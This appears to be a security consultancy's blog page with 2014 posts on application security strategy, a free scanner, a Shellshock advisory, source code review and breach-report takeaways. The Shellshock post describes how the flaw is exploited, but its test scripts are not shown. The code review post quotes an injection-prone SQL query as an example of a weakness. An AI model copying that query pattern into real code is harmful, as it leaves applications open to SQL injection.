3S Labs Banner

Thursday, November 6, 2014

Developing an Effective Strategy for Application Security

Web Application security is perhaps the most common and frequently discussed topic among researchers, small businesses as well as large enterprises. The primary reason is that, it has long overtaken network in being the most commonly attacked layer in a given IT infrastructure. Network and Operating System security has matured to a certain extent. Combined with various OS level hardening mechanism, the traditional attacks against network services has largely been mitigated or has become significantly costly. However, when it comes to web applications, for some reason, it appears that similar maturity in terms of risk mitigation is not achieved yet. Despite multiple WaF products and other security solutions for Web App security, the number of incidents related to compromise of organisation and its data by exploiting issues in web application has only increased in recent times.  For this reason, a different strategy or approach is required in order to safe guard web applications and implement a practice that encourage secure web application development.

Let Numbers Speak for Themselves

In order to better visualise the changing (or perhaps changed) Threat Perception in application and its associated infrastructure, let us consider the case of a Web Server and two web application development framework that is very popular among enterprise application developers - SpringSource Spring and Apache Struts. The statistics reveal that the number of vulnerabilities in the web server software itself is on a reducing path. The actual threat perception is significantly low compared to the numbers due to the existence of various OS level mitigation strategies that makes exploitation of memory corruption and other similar issues in web server process extremely costly/difficult. However, for web applications, the vulnerability classes are significantly different from those mitigated at OS level. New techniques and ease of exploitation has greatly increased the threat perception for web applications and web application development frameworks. Apart from common vulnerability classes, business logic vulnerabilities are another important issue that affects a lot of web applications.

Statistics for SpringSource Spring Framework

Statistics for Apache Struts Framework
Vulnerabilities in popular web application development frameworks are particularly critical due to the widespread impact. Since large enterprise applications are not easy to upgrade due to multiple dependency, vulnerabilities in framework software are extremely critical for such application and must be mitigated if not patched immediately.

Evaluating The Application Security Maturity

There is no single strategy that can help all organisations define a suitable approach for application security. There are various models, however, a carefully chosen model has to be customised and adopted based on the current posture, need and roadmap of any given organisation. Therefore, in order to define a suitable policy, it is very important to evaluate and ascertain the current application security maturity level of an organisation. This can be done to a certain extent by asking few questions:

  1. Is application penetration test (or VA as widely called) conducted regularly on all important applications?
  2. Are the same vulnerability classes for e.g. SQL Injection or CSRF detected every time a security test is conducted?
  3. Is there a training and evaluation program for developers?
  4. Is enforcement of secure coding guidelines implemented in IDE (or similar) level?

[1] The above questions helps in ascertaining the current security posture of an organisation as well as, to some extend, provides a direction for improvement in application security maturity. For example, if you have never done a Penetration Test on your applications, there is probably no need to immediately think of high level security policies or strategies, rather the organisation should focus on initiating regular security testing practices. [2] On the other hand, if you have been doing Penetration Testing for some time, however every time the same classes of vulnerabilities are discovered in different applications or newly implemented features, perhaps its time to think about the effectiveness of the strategy and its RoI. [3] & [4] are strategies that need to be adopted in order to avoid recurring vulnerabilities of similar classes.

Towards an Effective Strategy for Application Security Maturity

A good strategy for implementing or improving application security in an organisation should consists of at least the following:

  • Regular security testing of all applications against commonly occurring and newly discovered vulnerabilities.
  • Comprehensive security test covering maximum functionalities and business logic must be done for at least business critical applications if not all.
  • Vulnerability intelligence - Identify which classes of vulnerabilities has been detected the most in applications. Also identify if similar classes of vulnerabilities are introduced in newly developed applications and/or features.
  • Developer training on how to fix, avoid and mitigate security vulnerabilities is a must. This helps in ensuring that similar vulnerabilities are not re-introduced in future development efforts.

In general, the security strategy for most organisation is reactive in nature i.e. we react to discovered vulnerabilities by patching or mitigating the threat via. workarounds. For organisation with greater threat perception, this cannot continue for ever! An organisation must develop a security roadmap that consists of moving forward - Reactive to Proactive and finally towards Predictive.

For almost a decade, implementing security in an organisation usually started with a VA or PT, followed by patching of discovered issues. However, due to the nature of current threats and skill level of adversaries, it is not enough to continue fixing issues discovered during VA/PT. This method just don't scale and becomes almost unmanageable for large organisations with wide range of assets. It is important for an organisation to be more proactive where it mitigates common classes of vulnerabilities and work towards a better security development life-cycle where common security issues are avoided at design and development stage only.

Some of the points that should be considered while developing an application security strategy:

  • Regular security testing
  • Vulnerability management & intelligence
  • Security as a part of Development/SDLC
  • Developer training and skill development
  • Operational Security (secure deployment and management of apps)

Wednesday, October 8, 2014

Announcing Free Scan for Web Application Security

Online free service for Web App Security

What is it?

We are super excited to launch our FreeScan for Web Application Service. It is an online hosted service that can perform automatic security scan of websites or web applications. We have implemented tests for most commonly occurring issues in websites or web applications that can have a security impact.

Who is it for?

This service can be used by anybody with web presence, whose business continuity depends on confidentiality, integrity and availability of its website, business data and client data. Online businesses with strong brand presence can also use this service to look for common security issues to prevent loss of brand due to security incidents. Security engineers or administrators can benefit by scanning their web infrastructure using this service. If you are an enterprise with mass scanning requirements, this might not be the right solution for you. However, do get in touch, we might be able to offer something appropriate.

What does it offer?

The FreeScan for Web currently looks for a bunch of commonly occurring issues in web applications including:

  • HTTP headers security
  • HTTP cookie security
  • HTTP insecure methods
  • SSL/TLS crypto strength & security
  • SSL/TLS configuration weakness
  • Heartbleed
  • Shellshock

Why is it Free?

We in 3S Labs have been doing a lot of Web Application Penetration Testing. In fact, web security test is perhaps one of our most frequently delivered service. Due to our prolonged involvement, we have been writing a bunch of miscellaneous scripts and tools for detecting common issues in web applications. Although the quality of any Penetration Test depends significantly on the skill and expertise of the tester involved, identification of many of the commonly occurring issues can be automated to a certain extent to increase productivity. FreeScan is our project to offer online hosted security services for free, using tools and techniques that graduate out of our research lab. We intend to maintain and extend this service based on our R&D output. However, only tests that can be implemented automatically with a certain degree of reliability and can be executed in a fixed time will be added to FreeScan. This means, you can test your applications for common issues, however for serious security requirements (quality & coverage), you still need a good and experienced security consultant.

Due to the scope and architectural pattern used in developing FreeScan service, it can be easily scaled up or down depending on demand. We should be able to support scanning of a large number of websites or web applications using this service. However, due to the open nature of the service, misuse may be eminent. In order to prevent misuse, we have currently considered a manual approval of scan. In future, we might consider automating the ownership verification of a site to limit misuse and legal issues on our part.

Coverage and Quality

A conventional Web Application Penetration Test consists of roughly the following steps:
  1. Application discovery through web page crawling.
  2. Attack surface enumeration based on detected functionality.
  3. Testing various input/output flows for possible vulnerabilities.
  4. Business logic testing.
  5. Framework/technology specific testing.
In this case - [1], [2] & [3] are directly related i.e. based on the quality of [1] & [2], the effectiveness of [3] will be determined which is the most important part of a proper web application security testing. Apart from that, a security consultant must also enumerate various business logic in the application and test them duly for possible violations. In general, a web application test with good coverage requires significant human intervention and cannot be automated fully. Due to the nature of human intervention, the quality of findings depends on the skill and experience level of the person involved in testing.

We are not trying to build a full fledged web application security scanner. The complexity involved in developing and maintaining such a software is beyond the scope of this service. However, for all practical purpose, it has been noticed that roughly 20% of the vulnerabilities (or weakness) appears 80% of the time. Many of these issues are trivial to detect and can be automated as well. We want to implement these tests in our FreeScan service so that our service can be used to quickly identify most commonly occurring issues in a website or web application.

Critical Vulnerability Detection

Due to our in-house R&D capability, we are in a position to respond quickly to critical vulnerabilities that are discovered or found exploited in the wild. We intend to add detection capability in FreeScan for critical vulnerabilities that are discovered in the future. For example, we were able to analyze, reproduce and add test for Shellshock vulnerability disclosed recently. FreeScan for Web Application supports scanning for Shellshock vulnerability in web applications.

 FreeScan for Web Application

Friday, September 26, 2014

CVE-2014-6271 Bash Vulnerability a.k.a Shellshock

CVE-2014-6271 a.k.a Shellshock is command execution vulnerability in Bash shell via. specially crafted environment variable. As per NIST, the exploitation has been demonstrated against vectors involving ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

Due to the wide spread deployment and use of Bash shell on almost all Linux, OSX and other *nix based systems, this vulnerability is considered to be extremely critical with possible impact matching the Heartbleed issue, if not more.

Who is Affected?

Any application or system that invokes command through the bash shell can be potentially vulnerable. In order to exploit this issue in a target, an attacker needs to:

  • Set any environment variable with his controlled data.
  • Force the target to invoke any shell command through bash -c <cmd>

The immediate targets that can be exploited remotely are Web Servers with CGI support particularly those CGI scripts that are written in shell scripting. Apart from that, web applications written in various scripting language such as PHP, Perl, Python, Ruby etc. are equally vulnerable if deployed in CGI mode and the application at some point invokes shell command using functions like popen, exec, system etc.

How to Fix?

The bash shell needs to be updated to a patched version. For Debian based systems, it can be done using the following command:
apt-get install --only-upgrade bash

For RedHat or CentOS based system, following command can be used to update bash:
yum update bash

Note: The current fix in Bash is considered to be incomplete. A complete fix is yet to be released at the time of writing. The initial fix bypass is assigned the vulnerability identifier CVE-2014-7169.

Technical Analysis & Test Case

The simplest test case involves executing the following command in an affected bash shell:

If the string Vulnerable is printed, then the shell is affected by this issue.

Remote exploitation of this vulnerability can be demonstrated in a local environment using Apache/CGI based deployment and an affected version of Bash shell.

Sample CGI to demonstrate the vulnerability:

Following ruby script can be used as a test case for exploiting the above CGI for vulnerability detection:

The vulnerability can be confirmed if the HTTP response contains an additional header named X-Shellshock. Our FreeScan For Web Application service is updated with test to detect this vulnerability using a similar test case as described above. However it must be noted that the test is limited that uses common heuristic and should not be considered 100% reliable.


  • http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
  • https://rhn.redhat.com/errata/RHSA-2014-1306.html
  • https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Thursday, September 11, 2014

5 Vulnerabilities That Surely Need a Source Code Review

We have been performing Source Code Review (SCR) of multiple Java/JavaEE based Web Applications during the recent past. The results have convinced us and the customers that SCR is a valuable exercise that must be performed for business critical applications in addition to Penetration Testing. In terms of vulnerabilities, SCR has the potential to find some of the vulnerability classes that an Application Penetration Test will usually miss out. In this article we will provide a brief overview of some of the vulnerability classes which we frequently discover during an SCR that are missed out or very difficult to identify during Penetration Testing.

Additionally we hope we will be able to provide answers for the following commonly asked questions:
  1. I have already performed an Application Penetration Test. Do I still need to conduct a Source Code Review for the same application?
  2. What are the vulnerabilities found during Source Code Review that are often missed by Application Penetration Test?
Read More: Web Application Penetration Testing Service

Approach for Source Code Review

The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application in terms of its source code and configuration is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps:

Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)

A security weakness is an insecure practice or a dangerous API call or an insecure design. Some examples of weaknesses are:
  • Dynamic SQL Query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";
  • Dangerous or risky API call such as RunTime.exec, Statement.execute
  • Insecure Design such as using only MD5 hashing of passwords without any salt.

Correlation between Security Weakness and Dynamic Input

Dynamic construction of an SQL Query without the necessary validation or sanitization is definitely a security weakness, however it may not lead to security vulnerability if the SQL query does not involve any untrusted data. Hence it is required to identify code paths that start with an user input and reaches a possibly weak or risky code block. The absence of this phase will leave huge number of false positive in the results.

This step generally involves enumerating sources and finding a path between source to sink. A source in this case is any user controlled and untrusted input e.g. HTTP request parameters, cookies, uploaded file contents etc.

Five Vulnerabilities Source Code Review should Find

1. Insecure or Weak Cryptographic Implementation

SCR is a valuable exercise to discover weak or below standard cryptography techniques used in applications such as:
  • Use of MD5 or SHA1 without salt for password hashing.
  • Use of Java Random instead of SecureRandom.
  • Use of weak DES encryption.
  • Use of weak mode of otherwise strong encryption such as AES with ECB.
  • Susceptibility to Padding Oracle Attack.

2. Known Vulnerable Components

For a small-medium scale JavaEE based application, 80% of the code that is executed at runtime comes from libraries. The actual percentage for a given application can be identified by referencing Maven POM file, IVY dependency file or looking into the lib directory. It is a very common possibility for dependent libraries and framework components to have known vulnerabilities especially if the application is developed over considerable time frame. As an example, during 2011, following two vulnerable components were downloaded 22 million times:

During an SCR, known vulnerable components are easier to detect due to source code access and knowledge of exact version number of various libraries and framework components used, something that is lacking during an Application Penetration Testing.

3. Sensitive Information Disclosure

An SCR should discover if an application in binary (jar/war) or source code form may disclose sensitive information that may compromise the security of the production environment. Some of the commonly seen cases are:
  • Logs: Application logs sensitive information such as credentials or access keys in log files.
  • Configuration Files: Application discloses sensitive information such as shared secret or passwords in plain text configuration files.
  • Hardcoded Passwords and Keys: Many applications depend on encryption keys that are hardcoded within the source code. If an attacker manages to obtain even a binary copy of the application, it is possible to extract the key and hence compromise the security of the sensitive data.
  • Email address of Developers in Comments: A minor issue, but hardcoded email addresses and names of developers can provide valuable information to attackers to launch social engineering or spear phishing attacks.

4. Insecure Functionalities

An enterprise application usually goes through various transformations and releases. The application might have legacy functionality with security implications. An SCR should be able to find such legacy functionality and identify its security implications. Some of the examples of legacy functionalities with known security issues are given below:

  • RMI calls over insecure channel.
  • Kerberos implementation that are vulnerable to replay attack.
  • Legacy authentication & authorization technique with known weaknesses. 
  • J2EE bad practices such as direct management of database/resource connection that may lead to a Denial of Service.
  • Race condition bugs.

5. Security Misconfiguration

SCR should be able to find common security misconfiguration in application and its deployed environment related to database configuration, frameworks, application containers etc. Some of the commonly discovered issues include:

  • Application containers and database servers are running with highest (unnecessary) privilege.
  • Default accounts with password enabled and unchanged.
  • Insecure local file storage.

Additional Notes

An in-depth Source Code Review exercise is a valuable activity that has significant additional benefits apart from those mentioned above.

It is possible to conduct an in-depth review of implementation of security controls such as Cross-site Request Forgery (CSRF) prevention, Cross-site Scripting (XSS) prevention, SQL Injection prevention etc. It is not uncommon to find codes that lack or misuse such controls in a vulnerable manner resulting in bypass of protection.

There are multiple APIs that are considered to be risky or insecure as per various secure coding guidelines. It is possible to discover usage of such API in a given application easily and quickly during an SCR process.

SCR has the added benefit of being non-disruptive i.e. this activity does not require access to production environment and will not cause any service disruption.

Source Code Review (SCR) is a valuable technique to discover vulnerabilities in your Enterprise Application. It discovers certain class of vulnerabilities, which are difficult to find by conventional Application Penetration Testing.  However, it must be noted that Application Penetration Testing and Source Code Review are complementary in many ways and both independently contribute in enhancing overall security of application and infrastructure.

Thursday, August 28, 2014

Attack Patterns of 2013 and Lessons for the Future

Verizon DBIR 2014 is one of the most comprehensive and well researched report on various attacks and data breaches as seen by companies involved in attack & incident analysis and threat intelligence during 2013.

2013 Attack Patterns

As per the Data Breach Investigation Report (DBIR), year 2013 has seen top attacks and incidents in the following areas:
  • Point-of-Sale Systems
  • Web Applications
  • Cyber Espionage
  • Attack on Financial Services

Top attack patterns

Point of Sale (POS) Systems

It was found that majority of the attacks on POS systems were external in nature i.e. from outside the operating network. The intruders used simplistic scanning tools for identifying POS systems over the Internet. Once identified, guessed (educated) passwords and public exploits were the main tools of compromise to gain access in the systems. RAM scrapers were the primary tool of choice for these threat actors to collect decrypted payment related information including credit card details.

Web Applications

Web applications are surely the target of choice for most attackers. The amount of bug bounty earned by researchers across the world from companies like Google, Facebook, Paypal etc. for web application vulnerabilities speak for it.

However it must be considered that Bug Bounty programs should not be treated as a replacement for conventional Penetration Testing. The two approaches are complementary to each other. Any professional services engagement is usually time boxed and ideally should focus on core aspects of the security of target applications including its possible attack surfaces and issues that directly affect the business operations of the application. Given a large application, it may not be possible to identify all possible vulnerabilities within the defined time frame. This is where the Bug Bounty model comes in. The crowd sourced nature and pay per vulnerability model is effective in identifying and eliminating maximum low hanging fruits in the most cost effective manner. This is a typical case of - Given enough eyeballs, all bugs are shallow. It should also be noted that really complex and interesting vulnerabilities in popular services such as Facebook, Google, Github etc. has also been disclosed as a part of Bug Bounty initiatives. However due to the sheer volume of web applications, it is generally a better approach to consider both professional Penetration Testing and Bug Bounty programs for an effective security testing strategy.

Insider Abuse

It is relatively well known that an Information Technology infrastructure faces threat not only from outside its corporate network but also from inside. There has been multiple cases where Threat Actors were found to be insiders or assisted by insiders.

However it should be considered, due to lack of security awareness and operational security practices, insiders may end up being the pawns or pivot for launching attacks from inside the local network. The exploits of Syrian Electronic Army has highlighted the need for appropriate operational security practices. Even the strongest and most secure IT infrastructure may end up compromised due to lack of security awareness of those operating the systems. Hence it is very important to consider security in all three aspects viz. People, Process & Technology.

Shifting Motivation for Threat Actors

The DBIR also highlight an interesting pattern - The shifting motivation of Threat Actors. This is something inevitable given the rise of Bug Bounty programs and determination of important software vendors to consider defence-in-depth through exploit mitigation techniques to seriously increase the cost of practical attacks.

Threat actor motivation over time

Unlike popular perception, it turns out that random hacking incidents are relatively rare and most of the incidents so far are clearly motivated by economic gains. However over time, the data shows that the threat actors are shifting from Financial fraud to espionage related activities. This is probably an indicator of the growing importance of cyber medium for security agencies of various governments. This might also be an indicator of the growing cost of conducting practical attacks using sophisticated tools and 0day exploits.

Lessons or Inferences from the Investigation Report

  • POS System compromise could have been prevented by minimum security investments - Penetration Testing and basic Operational Security like strong passwords, use of Anti Virus etc. could have prevented a majority of the incidents.
  • Web Application vulnerabilities are still prevalent. The industry in general is very much aware of the issues and the rise of bug bounty programs might help curb misused vulnerabilities to a certain extend as long as companies do not replace conventional Penetration Testing with Bug Bounty programs - they complement each other.
  • Espionage "industry" is on the rise. The amount of leakage from relevant agencies involved in Cyber Espionage and exposure from their contractor companies provide enough evidence of its rise and prevalence. Growing investment will encourage researchers to continue innovative security research. Highly sophisticated tools and exploits will continue, but cost of entry will be very high.

General Takeaway

  • Minimum security investment is a must for any IT based business.
  • For organisations with serious security concerns - It is very important to realise that security cannot be achieved by a one-time investment. It is a practice that involves regular activities and development of individuals responsible for its operations.
  • Human Factor is an important aspect of the overall organisational IT infrastructure. Security development/maturity of the human factor must be equally considered along with the Technological aspect.
  • Vulnerabilities will exist. Most leaders in this business accept this fact and is working towards Defense-in-Depth. However you must reach a certain security maturity level in terms of your internal practices and externally exposed risks before you can start considering such strategies effectively.